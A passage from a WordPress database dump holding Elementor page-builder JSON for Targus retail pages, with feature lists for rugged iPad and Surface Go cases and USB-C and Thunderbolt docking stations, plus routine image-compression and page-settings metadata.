\\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2cb966a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ba550a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"6da4bbf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Available Color Black<\\/li><li>Passes military grade 4\\u2019 drop testing* for robust protection<\\/li><li>Premium fabric\\/faux leather exterior with metallic accents delivers standout style<\\/li><li>Patented 360\\u00b0 rotation for quick-switch portrait\\/landscape viewing<\\/li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position<\\/li><li>Boosts sound with audio-scoops that direct sound toward user<\\/li><li>Secure, metallic snap-close mechanism delivers quick access and striking style<\\/li><li>Premium faux leather hand strap<\\/li><li>Integrated Apple Pencil\\u00ae\\/stylus holder<\\/li><li>Limited lifetime warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4bdd233\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"6c9e329\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Available Color Black<\\/li><li>Heavy duty, shock-absorbing case for the iPad (6th gen. \\/ 5th gen.), iPad Pro (9.7-inch)<\\/li><li>Form-fit TPU shell with USA Military-Spec drop protection \\u2013 protects your device from 1.2m\\/4ft drops<\\/li><li>Offers rugged protection in a slim, professional-looking case<\\/li><li>Sound enhancing scoops for all iPad speakers<\\/li><li>Integrated stand for stable viewing and comfortable typing<\\/li><li>Optional detachable shoulder strap (THA101GLZ)<\\/li><li>Compatible with the ambient light sensor and mic on your device<\\/li><li>Clear window on back to display asset tag<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6b71a0e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"26da7ba\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"7094b67\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c542f72\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d3243ec\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d729ea6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"60d35e1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"84813a6\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"46d1844\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"5da049f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"7ac39cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Protect Case for Microsoft Surface\\u2122 Go<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ779GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f231dba\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"db2432a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Protect Case for Microsoft Surface\\u2122 Go<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THD491GLZ)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a8dc8da\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"1953aa2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"ac8efa3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/THZ779GL_11_PEN2_1024x1024.jpg?v=1571711592\\\" width=\\\"193\\\" height=\\\"193\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"398b7f1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"2b1f7b7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/THD491GL_20_USE4_1024x1024.jpg?v=1571711592\\\" width=\\\"192\\\" height=\\\"192\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b76d24\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"84599d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"b02e1d8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Available Color Black<\\/li><li>Case passes military grade 4\\u2019 drop testing (MIL-STD 810G)*<\\/li><li>Hard-moulded tray with durable kickstand<\\/li><li>Advanced corner protection with shock-absorbent TPU<\\/li><li>Non-slip interior for infinite viewing angles<\\/li><li>Integrated Surface Pen holder (pen not included)<\\/li><li>Compatible with Surface Type Cover<\\/li><li>Compatible with Surface Dock<\\/li><li>Full access to camera and ports<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"56f840c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"829e6ec\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Available Color Black<\\/li><li>Case passes military grade 4\\u2019 drop testing (MIL-STD 810G)*<\\/li><li>Hard-moulded tray with durable kickstand<\\/li><li>Advanced corner protection with shock-absorbent TPU<\\/li><li>Keyboard locking feature helps prevent accidental disconnects (keyboard not included)<\\/li><li>Detachable hand strap (included) and integrated Surface Pen holder (pen not included)<\\/li><li>Compatible with Surface Type Cover<\\/li><li>Compatible with Surface Dock<\\/li><li>Full access to camera and ports<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a6b2856\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"33e8d3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d4063c8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c2ef704\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"61e6c6e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(8883,3688,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:42.94927169669377775562679744325578212738037109375;s:5:\"bytes\";i:165563;s:11:\"size_before\";i:385485;s:10:\"size_after\";i:219922;s:4:\"time\";d:4.95000000000000017763568394002504646778106689453125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:32.8900000000000005684341886080801486968994140625;s:5:\"bytes\";i:1804;s:11:\"size_before\";i:5485;s:10:\"size_after\";i:3681;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:42.5499999999999971578290569595992565155029296875;s:5:\"bytes\";i:6996;s:11:\"size_before\";i:16441;s:10:\"size_after\";i:9445;s:4:\"time\";d:0.289999999999999980015985556747182272374629974365234375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:45.22999999999999687361196265555918216705322265625;s:5:\"bytes\";i:49537;s:11:\"size_before\";i:109523;s:10:\"size_after\";i:59986;s:4:\"time\";d:1.3600000000000000976996261670137755572795867919921875;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:41.11999999999999744204615126363933086395263671875;s:5:\"bytes\";i:54419;s:11:\"size_before\";i:132355;s:10:\"size_after\";i:77936;s:4:\"time\";d:1.9299999999999999378275106209912337362766265869140625;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:39.1400000000000005684341886080801486968994140625;s:5:\"bytes\";i:4799;s:11:\"size_before\";i:12261;s:10:\"size_after\";i:7462;s:4:\"time\";d:0.14000000000000001332267629550187848508358001708984375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:43.4200000000000017053025658242404460906982421875;s:5:\"bytes\";i:16677;s:11:\"size_before\";i:38405;s:10:\"size_after\";i:21728;s:4:\"time\";d:0.309999999999999997779553950749686919152736663818359375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:44.11999999999999744204615126363933086395263671875;s:5:\"bytes\";i:31331;s:11:\"size_before\";i:71015;s:10:\"size_after\";i:39684;s:4:\"time\";d:0.84999999999999997779553950749686919152736663818359375;}}}'),(8890,3695,'_elementor_css','a:5:{s:4:\"time\";i:1572924590;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(8893,3697,'_edit_lock','1572927455:1'),(8894,3697,'_edit_last','1'),(8895,3697,'_wp_page_template','template-fullwidth.php'),(8896,3697,'_elementor_controls_usage','a:0:{}'),(8897,3697,'swift-performance','a:0:{}'),(8898,3697,'_hide_page_title',''),(8899,3697,'_hide_header',''),(8900,3697,'_hide_footer',''),(8901,3697,'_hide_breadcrumb',''),(8902,3697,'_cover',''),(8903,3697,'_show_excerpt',''),(8904,3697,'_wc_apply_product',''),(8905,3697,'_yoast_wpseo_content_score','90'),(8915,3700,'_wp_page_template','template-fullwidth.php'),(8916,3700,'_elementor_edit_mode','builder'),(8917,3700,'_elementor_template_type','wp-page'),(8918,3700,'_elementor_version','2.7.4'),(8919,3700,'_elementor_data','[{\"id\":\"4e01da7\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"20\"},\"elements\":[{\"id\":\"542c5ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":28.378},\"elements\":[{\"id\":\"bb7c87a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"alignright\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/files\\/safeguard-your-valuables-safeport-rugged-ipad-case_300x300.jpg?v=1556613126\\\" alt=\\\"safeport rugged ipad case\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"24999da\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":71.622},\"elements\":[{\"id\":\"d8d0705\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 class=\\\"h3\\\"><span style=\\\"color: #000000;\\\">Safeguard Your Valuables<\\/span><\\/h2><div class=\\\"rte-setting\\\"><p>At Targus, protecting your devices is our top priority. Tablets are easily secured with our premium collection of iPad cases and other\\u00a0tablet cases\\u00a0- including\\u00a0Field-Ready\\u00a0and\\u00a0Rugged\\u00a0options for outdoor and industrial environments. We even have laptop backpacks with hidden zippered pockets and purpose-built compartments for your keys, phone, and other personal belongings.<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8e49670\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1304992\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"22f0297\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"869e28f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#f9f9f9\"},\"elements\":[{\"id\":\"554d7a4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":64.324,\"content_position\":\"center\",\"align\":\"center\"},\"elements\":[{\"id\":\"2ddae80\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 class=\\\"h3\\\"><span style=\\\"color: #000000;\\\">Expand Your Potential<\\/span><\\/h2><div class=\\\"rte-setting\\\"><p>At Targus, we\\u2019re about much more than just laptop backpacks. Our docking stations offer the convenience of universal connections, providing compatibility with multiple brands including Apple (Mac), Dell, Lenovo, HP, Acer, and Asus. This enables you to quickly plug in and connect at your home office, workstation, or on the road. Give your laptop wings as you easily connect to PC accessories like external monitors, speakers, keyboard\\/mice, and laptop chargers.<\\/p><p>4K docking stations\\u00a0are the perfect companion for media and design creatives, offering a quality four times that of 1080P high-definition. Our\\u00a0dual display universal docking stations hook up to two monitors for accelerated productivity and ease of transition between documents. You can find all the cables, adapters, and storage trays you need in our collection of docking station accessories.<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ab11fdc\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":35.676},\"elements\":[{\"id\":\"5677e5f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"alignleft\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/files\\/expand-your-potential-dock520usz-quad-docking-station_300x300.jpg?v=1556613316\\\" alt=\\\"expand your potential dock quad docking station\\\" width=\\\"519\\\" height=\\\"348\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bfcf376\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e6a7498\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"76d9e25\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9bceb31\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6ba22f6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"820d50e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Docking Stations\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#0c0c0c\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5abbfc0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"b0cb8c5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"83d2369\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div id=\\\"pdp-image-gallery\\\"><div class=\\\"MagicToolboxContainer layout-bottom thumbnail-size-small\\\"><h3 style=\\\"text-align: center;\\\"><strong>USB-C\\u2122 Universal QUAD HD (QVHD) Docking Station<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK520USZ)<\\/p><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ec5cce0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e58be5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>USB-C\\u2122 Universal DV4K Docking Station with 100W Power<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK190AP)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"20620af\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7e6c96e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Thunderbolt\\u2122 3 DV4K Docking Station with Power<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK220AP)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2be6e51\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"14dc97e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0ea999f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/DOCK520USZ_MAIN1_1024x1024.png?v=1558464095\\\" width=\\\"222\\\" height=\\\"222\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7ebdbda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7adb02b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/0042963_usb-c-universal-dv4k-docking-station-with-100w-power_grande.jpg?v=1543989907\\\" alt=\\\"USB-C\\u2122 Universal DV4K Docking Station with 100W Power\\\" width=\\\"210\\\" height=\\\"210\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dbfcd36\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e79c632\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/Dock220_grande.jpg?v=1553684715\\\" alt=\\\"Thunderbolt\\u2122 3 DV4K Docking Station with Power\\\" width=\\\"214\\\" height=\\\"214\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"535b089\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"c25718e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"65bbbfa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Supports four HD (1920 x 1080 p60) displays or two 2K (2560 x 1440 p50) displays via 4 HDMI ports<\\/li><li>Thunderbolt\\u2122 3 compatible<\\/li><li>1 USB-C 3.0 Port with power (15W non-PD)<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f9e3262\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abcb033\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Supports dual 4K Ultra HD monitor video via 2 DisplayPort\\u2122 (DP 1.2a) and 2 HDMI (HDMI 2.0) ports<\\/li><li>Power Delivery up to 100W<\\/li><li>Thunderbolt\\u2122 3 compatible<\\/li><li>1 USB-C USB 3.1 Gen 1 device port<\\/li><li>Includes 1-meter USB-C to C host cable (detachable) and 1 standard lock slot<\\/li><li>Power tips included to power Acer\\u00ae, ASUS\\u00ae, Compaq\\u00ae, Dell\\u2122, Fujitsu\\u00ae, Gateway\\u00ae, HP\\u00ae, IBM\\/Lenovo\\u2122, and Toshiba<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e01d2bb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b0ddb0f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>0.5M passive 40G, 5A cable (C\\/M to C\\/M)<\\/li><li>Cable lock slot<\\/li><li>Power Delivery 2.0 up to 85W<\\/li><li>Supports dual-display<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4e7b761\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"1a06dba\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a805784\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"84a363f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"316cffa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c570e8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1673a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6a345f9\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"b55e07f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"112d0b9\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1491c5c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"c1325c6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0c537db\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div id=\\\"pdp-image-gallery\\\"><div class=\\\"MagicToolboxContainer layout-bottom thumbnail-size-small\\\"><h3 style=\\\"text-align: center;\\\"><strong>Universal USB 3.0 DV Docking Station with Power<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK171)<\\/p><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a45b98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"80b3cd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Universal USB 3.0 DV4K Docking Station with Power<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK177)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"da54caa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"05b138b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Universal USB 3.0 DV4K Docking Station<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK160AP)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e1c8e0b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"1aa8cc8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec212c2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/ACP71USZ_grande.png?v=1551118350\\\" alt=\\\"Universal USB 3.0 DV Docking Station with Power\\\" width=\\\"197\\\" height=\\\"197\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a2463c1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"2bb069e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/0027659_universal-usb-30-dv4k-docking-station-with-power_grande.jpg?v=1543990156\\\" alt=\\\"Universal USB 3.0 DV4K Docking Station with Power\\\" width=\\\"205\\\" height=\\\"205\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d8676ca\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b6b9ca8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/dock160usz_grande.png?v=1554473002\\\" alt=\\\"Universal USB 3.0 DV4K Docking Station\\\" width=\\\"205\\\" height=\\\"205\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5008081\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"c1814d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d78e228\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Dual 2048 x 1152 at 60Hz 24 bpp color video (single 2K 2560 x 1440 at 50Hz HDMI) leveraging the DisplayLink DL-3900 technology<\\/li><li>19VDC PC laptop power and charging up to 90W<\\/li><li>Removable standalone power and charging tip compartment<\\/li><li>Integrated lock slot accommodates industry-standard security locks<\\/li><li>Wedge design for laptop mounting<\\/li><li>Includes detachable 1-meter USB \\u00b5B to A host cable<\\/li><li>Includes 120W AC adapter and power connected purple LED light<\\/li><li>Includes detachable 1-meter DC host power and charging cable<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d409cb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"362fae6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Dual DisplayPort 1.2++ (with MST), dual HDMI 2.0, or one of each external monitor port<\\/li><li>19VDC PC laptop power and charging up to 90W<\\/li><li>Removable standalone tip compartment<\\/li><li>Integrated lock slot accommodates industry-standard security locks<\\/li><li>Wedge design for laptop mounting<\\/li><li>Includes detachable 1-meter USB 3.0 uB to A host cable<\\/li><li>Includes 120W AC adapter and power connected purple LED light<\\/li><li>Includes detachable 1-meter DC host power and charging cable<\\/li><li>Dual 4K2K up to 4096x2160 60Hz (p60) 24 bpp color video monitor support leveraging the DisplayLink DL-6950 chipset<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d550746\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"80f7e0c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Dual DisplayPort (DP 1.2a) or Dual HDMI (HDMI 2.0) video or one of each<\\/li><li>Dual 4K Ultra HD video 4096x2160 60Hz (p60) 24 bpp with 6-Channel (5.1) Audio<\\/li><li>1 USB-C device port (USB 3.0 5Gbps data only)<\\/li><li>1 Gigabit Ethernet port for wired connectivity<\\/li><li>4 USB 3.0 ports for the latest peripherals (1 BC1.2 fast device-charging port)<\\/li><li>1 3.5mm combo Audio In\\/Out port for mics, speakers, and earphones<\\/li><li>Includes 1-meter USB-\\u00b5B\\/M to A\\/M cable (detachable)<\\/li><li>Ergonomic wedge design for comfortable typing<\\/li><li>Integrated lock slot accommodates standard industry-security locks to safeguard equipment<\\/li><li>Universal compatibility with the majority of laptop and PC tablet brands and platforms<\\/li><li>Includes 45W AC 